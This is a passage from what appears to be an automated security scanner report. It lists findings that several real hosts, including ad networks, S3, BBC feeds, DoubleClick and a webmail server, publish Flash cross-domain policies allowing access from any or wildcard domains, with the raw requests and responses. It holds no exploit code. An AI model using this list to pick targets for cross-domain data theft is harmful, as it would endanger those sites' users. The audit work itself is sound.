Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 18:36:54 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.18. http://m.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 16-May-2011 20:03:23 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.19. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 16 May 2011 18:35:34 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sun, 15 May 2011 18:35:34 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

5.20. http://r1-ads.ace.advertising.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r1-ads.ace.advertising.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:35:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:35:43 GMT
Content-Type: text/xml
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.21. http://r1.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r1.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r1.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:05:58 GMT
ETag: "289991e-f7-44d91abfe2980"
Accept-Ranges: bytes
Content-Length: 247
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Date: Sun, 15 May 2011 18:54:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.22. http://s3.amazonaws.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s3.amazonaws.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s3.amazonaws.com

Response

HTTP/1.1 200 OK
x-amz-id-2: uZR67R7fWCnMHlQmDayyE6cVENLbAMM6UVYWpXksZv7/sVaiFn/In/+KtywKWm/4
x-amz-request-id: E4E287A69016D106
Date: Sun, 15 May 2011 20:01:14 GMT
Content-Type: text/xml
Connection: close
Server: AmazonS3

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" secure="false" /></cross-domain-pol
...[SNIP]...

5.23. http://segment-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 15 May 2011 18:35:45 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.24. http://speed.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 18:35:48 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

5.25. http://t.mookie1.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:38:36 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 12 Apr 2011 21:52:25 GMT
ETag: "630000a-c9-4a0bfb522d840"
Accept-Ranges: bytes
Content-Length: 201
Keep-Alive: timeout=15, max=20
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.26. http://tcr.tynt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tcr.tynt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/xml
Date: Sun, 15 May 2011 20:00:49 GMT
ETag: "251523935"
Expires: Sun, 15 May 2011 20:30:50 GMT
Last-Modified: Tue, 10 Nov 2009 16:25:33 GMT
Server: EOS (lax001/283C)
X-Cache: HIT
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.27. http://vtr.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://vtr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vtr.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:23:49 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 02 Mar 2010 19:20:25 GMT
ETag: "510259-1f5-41f87040"
Accept-Ranges: bytes
Content-Length: 501
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" to-ports="*" secure="false" />
...[SNIP]...

5.28. http://webmail.vtr.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://webmail.vtr.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: webmail.vtr.net

Response

HTTP/1.1 200 OK
Content-Length: 97
Connection: close
Date: Sun, 15 May 2011 18:25:06 GMT
Content-Type: application/octet-stream
Server: CommuniGatePro/5.1.16

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>

5.29. http://www.kol.co.nz/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kol.co.nz
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kol.co.nz

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:25:16 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
Last-Modified: Thu, 27 May 2010 21:49:36 GMT
ETag: "40004a-16f-5dd81c00"
Accept-Ranges: bytes
Content-Length: 367
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="http://fre8393s2.wagner.2day.com" />
   <allow-access-from domain="fre8393s2.wagner.2day.com" />
   <allow-access-from domain="202.41.139.6" />
   <allow-access-from domain="*" />
...[SNIP]...

5.30. http://www.kosmix.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kosmix.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:00:43 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Thu, 14 Apr 2011 21:20:09 GMT
Accept-Ranges: bytes
Content-Length: 101
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:00:43 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:02:43 GMT;path=/

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.31. http://www.righthealth.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.righthealth.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:01:12 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Wed, 15 Sep 2010 16:51:18 GMT
Accept-Ranges: bytes
Content-Length: 101
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:01:12 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=47
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:16:12 GMT;path=/

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.32. http://api.tweetmeme.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 15 May 2011 18:26:54 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Sun, 15 May 2011 18:29:43 +0000 GMT
Etag: 9d3c7d0b9691696b415ce58b2738ea37
X-Served-By: h03

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...

5.33. http://cookex.amp.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cookex.amp.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cookex.amp.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:35:55 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 14 May 2010 21:53:13 GMT
Accept-Ranges: bytes
Content-Length: 1548
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
...[SNIP]...
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

5.34. http://feeds.bbci.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=118
Expires: Sun, 15 May 2011 18:05:14 GMT
Date: Sun, 15 May 2011 18:03:16 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

5.35. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 10:45:38 GMT
Expires: Mon, 16 May 2011 10:45:38 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 28208
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.36. http://newsrss.bbc.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Sun, 15 May 2011 18:05:14 GMT
Date: Sun, 15 May 2011 18:03:14 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

5.37. http://player.ooyala.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: player.ooyala.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 16 Jul 2010 14:51:39 GMT
Content-Type: text/x-cross-domain-policy
Cache-Control: public, max-age=3600
Date: Sun, 15 May 2011 18:38:16 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*.ooyala.com" />
...[SNIP]...

5.38. http://pubads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 18:10:02 GMT
Expires: Mon, 16 May 2011 18:10:02 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 895

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
